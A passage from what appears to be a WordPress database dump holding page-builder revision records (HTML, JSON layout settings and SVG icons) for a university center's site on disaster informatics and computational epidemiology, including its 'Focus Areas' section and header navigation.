style-local-20-c3 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-336-outer style-local-20-c4-outer\">\n            <div data-colibri-id=\"20-c4\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-336 style-local-20-c4 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-337-outer style-local-20-c5-outer\">\n            <div data-colibri-id=\"20-c5\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-337 style-local-20-c5 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                <!---->\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"20-c6\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-2 gutters-row-0 gutters-row-v-lg-2 gutters-row-v-md-2 gutters-row-v-2 style-331 style-local-20-c6 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-2 gutters-col-0 gutters-col-v-lg-2 gutters-col-v-md-2 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-auto h-col-md-auto h-col-auto style-333-outer style-local-20-c7-outer\">\n            <div data-colibri-id=\"20-c7\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-333 style-local-20-c7 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"20-c8\" class=\"h-global-transition-all h-heading style-334 style-local-20-c8 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-334 style-local-20-c8\">\n                    <!---->\n                    <!---->\n                    <h1 class=\"\">Focus Areas</h1>\n                  </div>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div data-colibri-id=\"20-c9\" class=\"h-row-container gutters-row-lg-2 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-2 gutters-row-v-md-0 gutters-row-v-2 style-272 style-local-20-c9 position-relative\">\n        <!---->\n        <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-2 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-2 gutters-col-v-md-0 gutters-col-v-2\">\n          <!---->\n          <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c10-outer\">\n            <div data-colibri-id=\"20-c10\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c10 position-relative\">\n              <!---->\n              <!---->\n              <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                <!---->\n                <div data-colibri-id=\"20-c11\" class=\"h-icon style-274 style-local-20-c11 position-relative h-element\">\n                  <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c11-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"server\" viewBox=\"0 0 1792 1896.0833\"><path d=\"M128 1408h1024v-128H128v128zm0-512h1024V768H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zM128 384h1024V256H128v128zm1568 448q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm0-512q0-40-28-68t-68-28-68 28-28 68 28 68 68 28 68-28 28-68zm96 832v384H0v-384h1792zm0-512v384H0V640h1792zm0-512v384H0V128h1792z\"></path></svg></span></div>\n                <div\n                  data-colibri-id=\"20-c12\" class=\"h-global-transition-all h-heading style-275 style-local-20-c12 position-relative h-element\">\n                  <!---->\n                  <div class=\"h-heading__outer style-275 style-local-20-c12\">\n                    <!---->\n                    <!---->\n                    <h5 class=\"\">disease &amp; disaster modeling</h5>\n                  </div>\n              </div>\n              <div data-colibri-id=\"20-c13\" class=\"h-text h-text-component style-276 style-local-20-c13 position-relative h-element\">\n                <!---->\n                <!---->\n                <div class=\"\">\n                  <p>Develop data-driven, computational solutions to address challenges posed by disaster and disease risk assessment, forecasting, and mitigation, including issues aimed at assessing and reducing structural disparities</p>\n                </div>\n              </div>\n            </div>\n          </div>\n        </div>\n        <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c14-outer\">\n          <div data-colibri-id=\"20-c14\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c14 position-relative\">\n            <!---->\n            <!---->\n            <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n              <!---->\n              <div data-colibri-id=\"20-c15\" class=\"h-icon style-274 style-local-20-c15 position-relative h-element\">\n                <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c15-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"database\" viewBox=\"0 0 1542.7035 1896.0833\"><path d=\"M768 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5T103 896 0 768V598q119 84 325 127t443 43zm0 768q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1536v-170q119 84 325 127t443 43zm0-384q237 0 443-43t325-127v170q0 69-103 128t-280 93.5-385 34.5-385-34.5-280-93.5T0 1152V982q119 84 325 127t443 43zM768 0q208 0 385 34.5t280 93.5 103 128v128q0 69-103 128t-280 93.5T768 640t-385-34.5T103 512 0 384V256q0-69 103-128t280-93.5T768 0z\"></path></svg></span></div>\n              <div\n                data-colibri-id=\"20-c16\" class=\"h-global-transition-all h-heading style-275 style-local-20-c16 position-relative h-element\">\n                <!---->\n                <div class=\"h-heading__outer style-275 style-local-20-c16\">\n                  <!---->\n                  <!---->\n                  <h5 class=\"\">data as a service</h5>\n                </div>\n            </div>\n            <div data-colibri-id=\"20-c17\" class=\"h-text h-text-component style-276 style-local-20-c17 position-relative h-element\">\n              <!---->\n              <!---->\n              <div class=\"\">\n                <p>Provide data and computational support to researchers who need extensive data processing and analysis but may not have the necessary technical skills and computational infrastructure</p>\n              </div>\n            </div>\n          </div>\n        </div>\n      </div>\n      <div class=\"h-column h-column-container d-flex h-col-lg-4 h-col-md-4 h-col-12 style-273-outer style-local-20-c18-outer\">\n        <div data-colibri-id=\"20-c18\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-3 h-px-2 v-inner-lg-0 v-inner-md-3 v-inner-2 style-273 style-local-20-c18 position-relative\">\n          <!---->\n          <!---->\n          <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n            <!---->\n            <div data-colibri-id=\"20-c19\" class=\"h-icon style-274 style-local-20-c19 position-relative h-element\">\n              <!----><span class=\"h-svg-icon h-icon__icon style-274-icon style-local-20-c19-icon\"><!--Icon by Font Awesome (https://fontawesome.com)--><svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"users\" viewBox=\"0 0 1920 1896.0833\"><path d=\"M593 896q-162 5-265 128H194q-82 0-138-40.5T0 865q0-353 124-353 6 0 43.5 21t97.5 42.5T384 597q67 0 133-23-5 37-5 66 0 139 81 256zm1071 637q0 120-73 189.5t-194 69.5H523q-121 0-194-69.5T256 1533q0-53 3.5-103.5t14-109T300 1212t43-97.5 62-81 85.5-53.5T602 960q10 0 43 21.5t73 48 107 48 135 21.5 135-21.5 107-48 73-48 43-21.5q61 0 111.5 20t85.5 53.5 62 81 43 97.5 26.5 108.5 14 109 3.5 103.5zM640 256q0 106-75 181t-181 75-181-75-75-181 75-181T384 0t181 75 75 181zm704 384q0 159-112.5 271.5T960 1024 688.5 911.5 576 640t112.5-271.5T960 256t271.5 112.5T1344 640zm576 225q0 78-56 118.5t-138 40.5h-134q-103-123-265-128 81-117 81-256 0-29-5-66 66 23 133 23 59 0 119-21.5t97.5-42.5 43.5-21q124 0 124 353zm-128-609q0 106-75 181t-181 75-181-75-75-181 75-181 181-75 181 75 75 181z\"></path></svg></span></div>\n            <div\n              data-colibri-id=\"20-c20\" class=\"h-global-transition-all h-heading style-275 style-local-20-c20 position-relative h-element\">\n              <!---->\n              <div class=\"h-heading__outer style-275 style-local-20-c20\">\n                <!---->\n                <!---->\n                <h5 class=\"\">Impact assessment</h5>\n              </div>\n          </div>\n          <div data-colibri-id=\"20-c21\" class=\"h-text h-text-component style-276 style-local-20-c21 position-relative h-element\">\n            <!---->\n            <!---->\n            <div class=\"\">\n              <p>Facilitate application of data analysis tools that can spark critical insights into the impacts of disasters and diseases on societies and the environment, particularly among vulnerable population groups</p>\n            </div>\n          </div>\n        </div>\n      </div>\n    </div>\n  </div>\n</div>\n</div>\n</div>\n</div>','Front Page','','inherit','closed','closed','','20-revision-v1','','','2022-04-29 08:54:56','2022-04-29 12:54:56','',20,'https://gsudice.dataconn.net/?p=1281',0,'revision','',0),(1282,1,'2022-04-29 08:54:56','2022-04-29 12:54:56','{\"name\":\"hop-header\",\"id\":\"22-h1\",\"type\":\"header\",\"ui\":{\"isSelected\":true,\"isHovered\":false},\"partialId\":22,\"styleRef\":194,\"children\":[{\"name\":\"hop-navigation\",\"props\":{\"anchor\":false,\"name\":\"Navigation\",\"attrs\":{\"id\":\"navigation\"},\"backup\":{\"overlap\":{\"menu\":null}}},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"logo\"},\"mirror\":\"navigation-logo\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-logo\"}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h5\",\"parentId\":\"22-h4\",\"partialId\":22,\"styleRef\":247,\"type\":\"header\"}],\"id\":\"22-h4\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":246,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"flexgrow\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"spacing\"},\"mirror\":\"navigation-spacing\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-spacing\"}},\"id\":\"22-h6\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":248,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"fitToContent\"},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"fitToContent\"}}}}}},\"props\":{\"internal\":{\"navContent\":{\"type\":\"menu\"},\"mirror\":\"navigation-menu\"},\"attrs\":{\"data-placeholder-provider\":\"navigation-menu\"}},\"children\":[{\"name\":\"hop-horizontal-menu\",\"children\":[{\"name\":\"hop-mobile-menu\",\"children\":[{\"name\":\"hop-offscreen-panel\",\"slots\":{\"header\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-logo\",\"id\":\"22-h14\",\"parentId\":\"22-h13\",\"partialId\":22,\"styleRef\":256,\"type\":\"header\"}],\"id\":\"22-h13\",\"parentId\":\"22-h12\",\"partialId\":22,\"styleRef\":255,\"type\":\"header\"}],\"id\":\"22-h12\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":254,\"type\":\"header\"}],\"footer\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"flexgrow\",\"custom\":{\"value\":100,\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>&copy; 2022<\\/p>\"},\"id\":\"22-h17\",\"parentId\":\"22-h16\",\"partialId\":22,\"styleRef\":259,\"type\":\"header\"}],\"id\":\"22-h16\",\"parentId\":\"22-h15\",\"partialId\":22,\"styleRef\":258,\"type\":\"header\"}],\"id\":\"22-h15\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":257,\"type\":\"header\"}]},\"children\":[{\"name\":\"hop-accordion-menu\",\"props\":{\"_isOffcanvasMenu\":true},\"id\":\"22-h11\",\"parentId\":\"22-h10\",\"partialId\":22,\"styleRef\":253,\"type\":\"header\"}],\"id\":\"22-h10\",\"parentId\":\"22-h9\",\"partialId\":22,\"styleRef\":252,\"type\":\"header\"}],\"id\":\"22-h9\",\"parentId\":\"22-h8\",\"partialId\":22,\"styleRef\":251,\"type\":\"header\"}],\"props\":{\"wordpressThemeLocation\":{\"id\":\"header-menu\",\"label\":\"Header primary menu\"}},\"id\":\"22-h8\",\"parentId\":\"22-h7\",\"partialId\":22,\"styleRef\":250,\"type\":\"header\"}],\"id\":\"22-h7\",\"parentId\":\"22-h3\",\"partialId\":22,\"styleRef\":249,\"type\":\"header\"}],\"id\":\"22-h3\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":245,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"type\":\"header\",\"id\":\"22-h2\",\"partialId\":22,\"slots\":{\"topBar\":[{\"name\":\"hop-top-bar\",\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"75\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-icon-list\",\"props\":{\"iconList\":[{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"Location, State, Country\",\"allIcons\":false,\"icon\":\"font-awesome\\/map-marker\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"(000) 123 12345\",\"allIcons\":false,\"icon\":\"font-awesome\\/phone-square\",\"type\":\"svg\"},{\"title\":\"List\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false},\"text\":\"email@yoursite.com\",\"allIcons\":false,\"icon\":\"font-awesome\\/envelope\",\"type\":\"svg\"}]},\"styleRef\":263,\"slot\":null,\"parentId\":\"22-h20\",\"index\":0,\"id\":\"22-h21\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h20\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":262,\"type\":\"header\"},{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":\"25\",\"unit\":\"%\"}}}}},\"children\":[{\"name\":\"hop-social-icons\",\"props\":{\"icons\":[{\"name\":\"font-awesome\\/facebook-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/twitter-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/youtube-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}},{\"name\":\"font-awesome\\/vimeo-square\",\"type\":\"svg\",\"link\":{\"value\":\"\",\"typeOpenLink\":\"sameWindow\",\"noFollow\":false}}]},\"styleRef\":265,\"slot\":null,\"parentId\":\"22-h22\",\"index\":0,\"id\":\"22-h23\",\"partialId\":22,\"type\":\"header\"}],\"id\":\"22-h22\",\"parentId\":\"22-h19\",\"partialId\":22,\"styleRef\":264,\"type\":\"header\"}],\"id\":\"22-h19\",\"parentId\":\"22-h18\",\"partialId\":22,\"styleRef\":261,\"type\":\"header\"}],\"id\":\"22-h18\",\"parentId\":\"22-h2\",\"partialId\":22,\"styleRef\":260,\"type\":\"header\",\"slot\":\"topBar\"}]},\"styleRef\":244},{\"name\":\"hop-hero\",\"props\":{\"name\":\"Hero\",\"attrs\":{\"id\":\"hero\"},\"anchor\":false},\"children\":[{\"name\":\"hop-row\",\"children\":[{\"name\":\"hop-column\",\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"text\"}}},\"children\":[{\"name\":\"hop-heading\",\"props\":{\"content\":\"Center for Disaster Informatics &amp; Computational Epidemiology<br>\"},\"id\":\"22-h27\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":215,\"type\":\"header\"},{\"name\":\"hop-text\",\"props\":{\"content\":\"<p>Enabling Data-Driven Disaster Assessment &amp; Planning<br><\\/p>\"},\"id\":\"22-h28\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":216,\"type\":\"header\"},{\"name\":\"hop-button-group\",\"children\":[{\"name\":\"hop-button\",\"id\":\"22-h38\",\"parentId\":\"22-h37\",\"partialId\":22,\"styleRef\":678,\"type\":\"header\",\"props\":{\"text\":\"our mission\",\"link\":{\"value\":\"https:\\/\\/gsudice.dataconn.net\\/members\\/our-mission\\/\"}}}],\"slot\":null,\"parentId\":\"22-h26\",\"index\":2,\"id\":\"22-h37\",\"partialId\":22,\"styleRef\":677,\"type\":\"header\"},{\"name\":\"hop-button-group\",\"children\":[{\"name\":\"hop-button\",\"props\":{\"text\":\"Learn More\",\"link\":{\"value\":\"\\/about\\/\"}},\"id\":\"22-h30\",\"parentId\":\"22-h29\",\"partialId\":22,\"styleRef\":218,\"type\":\"header\"}],\"id\":\"22-h29\",\"parentId\":\"22-h26\",\"partialId\":22,\"styleRef\":217,\"type\":\"header\"}],\"id\":\"22-h26\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":214,\"type\":\"header\"},{\"name\":\"hop-column\",\"children\":[{\"name\":\"hop-image\",\"id\":\"22-h32\",\"parentId\":\"22-h31\",\"partialId\":22,\"styleRef\":221,\"type\":\"header\",\"props\":{\"url\":\"https:\\/\\/gsudice.dataconn.net\\/wp-content\\/uploads\\/2022\\/02\\/unsplash.jpg\",\"caption\":{\"text\":\"\"},\"imageId\":258,\"size\":\"\"}}],\"style\":{\"descendants\":{\"outer\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":50,\"unit\":\"%\"}},\"media\":{\"mobile\":{\"columnWidth\":{\"type\":\"custom\",\"custom\":{\"value\":100,\"unit\":\"%\"}}},\"tablet\":{\"columnWidth\":{\"custom\":{\"value\":80,\"unit\":\"%\"}}}}}}},\"props\":{\"internal\":{\"heroSection\":{\"type\":\"media\"}}},\"id\":\"22-h31\",\"parentId\":\"22-h25\",\"partialId\":22,\"styleRef\":220,\"type\":\"header\"}],\"id\":\"22-h25\",\"parentId\":\"22-h24\",\"partialId\":22,\"styleRef\":213,\"type\":\"header\"}],\"parentId\":\"22-h1\",\"id\":\"22-h24\",\"partialId\":22,\"styleRef\":212,\"type\":\"header\",\"slots\":{\"downArrow\":[{\"name\":\"hop-down-arrow\",\"slots\":{\"button\":[{\"name\":\"hop-down-arrow-scroll-button-group\",\"children\":[{\"name\":\"hop-down-arrow-scroll-button\",\"id\":\"22-h35\",\"parentId\":\"22-h34\",\"partialId\":22,\"styleRef\":224,\"type\":\"header\",\"props\":{\"text\":\"down\"}}],\"id\":\"22-h34\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":223,\"type\":\"header\"}],\"icon\":[{\"name\":\"hop-down-arrow-scroll-icon\",\"id\":\"22-h36\",\"parentId\":\"22-h33\",\"partialId\":22,\"styleRef\":225,\"type\":\"header\",\"props\":{\"name\":\"font-awesome\\/angle-down\"}}]},\"parentId\":\"22-h24\",\"slot\":\"downArrow\",\"id\":\"22-h33\",\"partialId\":22,\"styleRef\":222,\"type\":\"header\"}]}}]}','','','inherit','closed','closed','','23-revision-v1','','','2022-04-29 08:54:56','2022-04-29 12:54:56','',23,'https://gsudice.dataconn.net/?p=1282',0,'revision','',0),(1283,1,'2022-04-29 08:54:56','2022-04-29 12:54:56','<div data-colibri-id=\"22-h1\" class=\"page-header style-194 style-local-22-h1 position-relative\">\n  <!---->\n  <div data-colibri-navigation-overlap=\"false\" role=\"banner\" class=\"h-navigation_outer style-244-outer style-local-22-h2-outer\">\n    <!---->\n    <div id=\"navigation\" data-colibri-component=\"navigation\" data-colibri-id=\"22-h2\" class=\"h-section h-navigation h-navigation d-flex style-244 style-local-22-h2\">\n      <!---->\n      <div class=\"h-section-grid-container h-section-fluid-container\">\n        <div data-nav-normal=\"\">\n          <div data-colibri-id=\"22-h3\" class=\"h-row-container h-section-boxed-container gutters-row-lg-0 gutters-row-md-0 gutters-row-2 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-2 style-245 style-local-22-h3 position-relative\">\n            <!---->\n            <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-2 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-2\">\n              <!---->\n              <div class=\"h-column h-column-container d-flex h-col-none style-246-outer style-local-22-h4-outer\">\n                <div data-colibri-id=\"22-h4\" data-placeholder-provider=\"navigation-logo\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-246 style-local-22-h4 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-id=\"22-h5\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-247 style-local-22-h5 position-relative h-element\">\n                      <!---->\n                      <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n                        <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-247-image style-local-22-h5-image\">\n                        <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-247-image style-local-22-h5-image\">\n                      </a>\n                    </div>\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-248-outer style-local-22-h6-outer h-hide-sm\">\n                <div data-colibri-id=\"22-h6\" data-placeholder-provider=\"navigation-spacing\" class=\"d-flex h-flex-basis h-column__inner h-ui-empty-state-container h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-248 style-local-22-h6 h-hide-sm position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100\">\n                    <!---->\n                  </div>\n                </div>\n              </div>\n              <div class=\"h-column h-column-container d-flex h-col-none style-249-outer style-local-22-h7-outer\">\n                <div data-colibri-id=\"22-h7\" data-placeholder-provider=\"navigation-menu\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-0 h-px-md-0 h-px-0 v-inner-lg-0 v-inner-md-0 v-inner-0 style-249 style-local-22-h7 position-relative\">\n                  <!---->\n                  <!---->\n                  <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-auto align-self-lg-center align-self-md-center align-self-center\">\n                    <!---->\n                    <div data-colibri-component=\"dropdown-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h8\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography has-offcanvas-mobile h-menu-horizontal h-dropdown-menu style-250 style-local-22-h8 position-relative h-element\">\n                      <!---->\n                      <div class=\"h-global-transition-all h-main-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                      <div data-colibri-id=\"22-h9\" class=\"h-mobile-menu h-global-transition-disable style-251 style-local-22-h9 position-relative h-element\">\n                        <!---->\n                        <a data-click-outside=\"true\" data-target=\"#offcanvas-wrapper-22-h9\" data-target-id=\"offcanvas-wrapper-22-h9\" data-offcanvas-overlay-id=\"offcanvas-overlay-22-h9\" href=\"#\" data-colibri-component=\"offcanvas\" data-direction=\"right\"\n                          data-push=\"false\" title=\"Menu\" class=\"h-hamburger-button\">\n                          <div class=\"icon-container h-hamburger-icon\">\n                            <div class=\"h-icon-svg\" style=\"width: 100%; height: 100%;\">\n                              <!--Icon by Font Awesome (https://fontawesome.com)-->\n                              <svg version=\"1.1\" xmlns=\"http://www.w3.org/2000/svg\" xmlns:xlink=\"http://www.w3.org/1999/xlink\" id=\"bars\" viewBox=\"0 0 1536 1896.0833\">\n                                <path d=\"M1536 1344v128q0 26-19 45t-45 19H64q-26 0-45-19t-19-45v-128q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 960V832q0-26 19-45t45-19h1408q26 0 45 19t19 45zm0-512v128q0 26-19 45t-45 19H64q-26 0-45-19T0 448V320q0-26 19-45t45-19h1408q26 0 45 19t19 45z\"></path>\n                              </svg>\n                            </div>\n                          </div>\n                        </a>\n                        <div id=\"offcanvas-wrapper-22-h9\" class=\"h-offcanvas-panel offcanvas offcanvas-right hide force-hide style-251-offscreen style-local-22-h9-offscreen\">\n                          <div data-colibri-id=\"22-h10\" class=\"d-flex flex-column h-offscreen-panel style-252 style-local-22-h10 position-relative h-element\">\n                            <!---->\n                            <div class=\"offscreen-header h-ui-empty-state-container\">\n                              <div data-colibri-id=\"22-h12\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 style-254 style-local-22-h12 position-relative\">\n                                <!---->\n                                <div class=\"h-row justify-content-lg-center justify-content-md-center justify-content-center align-items-lg-stretch align-items-md-stretch align-items-stretch gutters-col-lg-0 gutters-col-md-0 gutters-col-0 gutters-col-v-lg-0 gutters-col-v-md-0 gutters-col-v-0\">\n                                  <!---->\n                                  <div class=\"h-column h-column-container d-flex h-col-none style-255-outer style-local-22-h13-outer\">\n                                    <div data-colibri-id=\"22-h13\" class=\"d-flex h-flex-basis h-column__inner h-px-lg-2 h-px-md-2 h-px-2 v-inner-lg-2 v-inner-md-2 v-inner-2 style-255 style-local-22-h13 position-relative\">\n                                      <!---->\n                                      <!---->\n                                      <div class=\"w-100 h-y-container h-column__content h-column__v-align flex-basis-100 align-self-lg-start align-self-md-start align-self-start\">\n                                        <!---->\n                                        <div data-colibri-id=\"22-h14\" class=\"d-flex align-items-center text-lg-center text-md-center text-center justify-content-lg-center justify-content-md-center justify-content-center style-256 style-local-22-h14 position-relative h-element\">\n                                          <!---->\n                                          <a rel=\"home\" href=\"[colibri_home_url]\" h-use-smooth-scroll=\"true\" class=\"d-flex align-items-center\">\n                                            <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__image h-logo__image_h logo-image style-256-image style-local-22-h14-image\">\n                                            <img src=\"[colibri_custom_logo_url]\" class=\"h-logo__alt-image h-logo__alt-image_h logo-alt-image style-256-image style-local-22-h14-image\">\n                                          </a>\n                                        </div>\n                                      </div>\n                                    </div>\n                                  </div>\n                                </div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-content\">\n                              <!---->\n                              <div data-colibri-component=\"accordion-menu\" role=\"navigation\" h-use-smooth-scroll-all=\"true\" data-colibri-id=\"22-h11\" class=\"h-menu h-global-transition-all h-ignore-global-body-typography h-mobile-menu h-menu-accordion style-253 style-local-22-h11 position-relative h-element\">\n                                <!---->\n                                <div class=\"h-global-transition-all h-mobile-menu\">[colibri_print_menu id=\"header-menu\" classes=\"none \" show_shopping_cart=\"0\" depth=\"0\"]</div>\n                              </div>\n                            </div>\n                            <div class=\"offscreen-footer h-ui-empty-state-container\">\n                              <div data-colibri-id=\"22-h15\" class=\"h-row-container gutters-row-lg-0 gutters-row-md-0 gutters-row-0 gutters-row-v-lg-0 gutters-row-v-md-0 gutters-row-v-0 